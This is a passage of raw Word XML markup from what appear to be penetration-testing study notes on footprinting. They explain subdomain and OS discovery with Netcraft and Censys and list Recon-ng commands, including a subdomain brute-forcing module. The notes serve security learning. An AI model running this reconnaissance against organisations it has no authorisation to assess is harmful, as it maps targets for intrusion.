              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4170E8BF" w14:textId="77777777" w:rsidR="00BA047C" w:rsidRDefault="00BA047C" w:rsidP="00A074EF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="239DB949" w14:textId="77777777" w:rsidR="00BA047C" w:rsidRDefault="00BA047C" w:rsidP="00A074EF"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4139286D" w14:textId="77777777" w:rsidR="000079AE" w:rsidRDefault="000079AE"/>
    <w:p w14:paraId="0925C05B" w14:textId="77777777" w:rsidR="000079AE" w:rsidRDefault="000079AE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F209EC4" w14:textId="4716A4E5" w:rsidR="000079AE" w:rsidRDefault="000079AE" w:rsidP="000079AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Footprinting: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Netcraft</w:t>
      </w:r>
      <w:r w:rsidR="009E5379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="009E5379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Censys</w:t>
      </w:r>
      <w:r w:rsidR="00832D17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00832D17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Recon-ng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2713"/>
        <w:gridCol w:w="7699"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA2601" w14:paraId="4B79510C" w14:textId="77777777" w:rsidTr="00832D17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="11A997B9" w14:textId="4E558E46" w:rsidR="00FA2601" w:rsidRDefault="00FA2601" w:rsidP="00716493">
            <w:r>
              <w:t>13.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="322E53AC" w14:textId="57D0A152" w:rsidR="00FA2601" w:rsidRDefault="00FA2601" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Netcraft</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00FA2601">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Web page application</w:t>
            </w:r>
            <w:r w:rsidR="009E5379">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="009E5379" w:rsidRPr="000079AE">
              <w:t xml:space="preserve"> www.netcraft.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2601">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36B4A70C" w14:textId="11060662" w:rsidR="00FA2601" w:rsidRPr="000079AE" w:rsidRDefault="00FA2601" w:rsidP="00716493">
            <w:r>
              <w:t>To extract company domains and sub-domains, Netcraft web service can be used.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">First navigate to </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://www.netcraft.com.</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">From the menu bar on the website, click on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Resources’ &gt; ‘Tools’ &gt; ‘Site Report’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> tab (also found at </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://sitereport.netcraft.com</w:t>
            </w:r>
            <w:r>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA2601" w14:paraId="672B0F68" w14:textId="77777777" w:rsidTr="00832D17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="08272376" w14:textId="07C03342" w:rsidR="00FA2601" w:rsidRDefault="00FA2601" w:rsidP="00716493">
            <w:r>
              <w:t>13.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="60882122" w14:textId="2B515965" w:rsidR="00FA2601" w:rsidRDefault="00FA2601" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7699" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="08A96F9A" w14:textId="45C34E59" w:rsidR="00FA2601" w:rsidRDefault="00FA2601" w:rsidP="00716493">
            <w:r>
              <w:t xml:space="preserve">Other tools such as Sublist3r, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Pentes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-Tools Find Subdomains also exist for this purpose.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5379" w14:paraId="271BA170" w14:textId="77777777" w:rsidTr="00832D17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="31DF4AEF" w14:textId="077D3B49" w:rsidR="009E5379" w:rsidRDefault="009E5379" w:rsidP="00716493">
            <w:r>
              <w:t>13.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5E4A7A4E" w14:textId="51D20EF4" w:rsidR="009E5379" w:rsidRDefault="009E5379" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Censys</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00FA2601">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Web page application</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> www.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="typetext"/>
              </w:rPr>
              <w:t>censys.io/domain?q=</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2601">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7699" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A42FE1D" w14:textId="0188B90E" w:rsidR="009E5379" w:rsidRDefault="009E5379" w:rsidP="00716493">
            <w:r>
              <w:t>We can also gather target OS information through passive footprinting using the Censys web service.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Navigate to </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://www.censys.io/domain?q=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00822805" w14:paraId="3A444647" w14:textId="77777777" w:rsidTr="00832D17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2CFAB1CF" w14:textId="38949E81" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:t>13.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="28841928" w14:textId="7F49725C" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Recon-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7699" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6EC5EDE4" w14:textId="576FEACC" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r w:rsidRPr="00832D17">
              <w:t>Recon-ng is a web reconnaissance framework with independent modules and database interaction that provides an environment in which open-source web-based reconnaissance can be conducted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00822805" w14:paraId="3F180AA3" w14:textId="77777777" w:rsidTr="00832D17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="104DEC30" w14:textId="1FE30DE1" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:t>13.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="186AABDB" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7699" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="430768BB" w14:textId="274662D2" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:t xml:space="preserve">To start up the console, simply enter: </w:t>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>recon-ng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
              <w:t>help</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:t>Display a useful list of commands and explanations</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39195F06" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">marketplace </w:t>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Installs all modules available</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EBCAED6" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>search</w:t>
            </w:r>
            <w:r w:rsidRPr="000D744A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Displays all modules available</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426FF1C0" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>work</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>paces</w:t>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Displays commands related to workspaces</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">workspaces </w:t>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">create </w:t>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Creates a new workspace</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B170F34" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">workspaces </w:t>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>list</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Displays all workspaces within the db</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="472E0444" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>insert domains</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Adds a domain to current workspace</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F1CB11" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">show </w:t>
            </w:r>
            <w:r w:rsidRPr="00E161C5">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>domains</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00914AAC">
              <w:t>Shows all domains</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D4073AB" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00914AAC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="00914AAC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">load </w:t>
            </w:r>
            <w:r w:rsidRPr="00914AAC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>brute</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>View all modules related to brute forcing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330DD52B" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00914AAC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="00914AAC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">load </w:t>
            </w:r>
            <w:r w:rsidRPr="00914AAC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>recon/domains-hosts/brute_hosts</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Loads the selected module</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092910E8" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E77D37">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Run the loaded module on domains</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E77D37">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>back</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>move back/remove module</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E77D37">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="00E77D37">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">load </w:t>
            </w:r>
            <w:r w:rsidRPr="00E77D37">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>recon/hosts-hosts/reverse_resolve</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Loads the selected module</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8A6256" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E77D37">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">show </w:t>
            </w:r>
            <w:r w:rsidRPr="00E77D37">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>hosts</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Shows all hosts harvested so far</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F39582" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">load </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>reporting</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>View all modules related to reporting</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FD5DDA3" w14:textId="010EAEEB" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">load </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>reporting/html</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Loads the selected module</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>info</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>command</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>View options required to run module</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43794A48" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">options </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
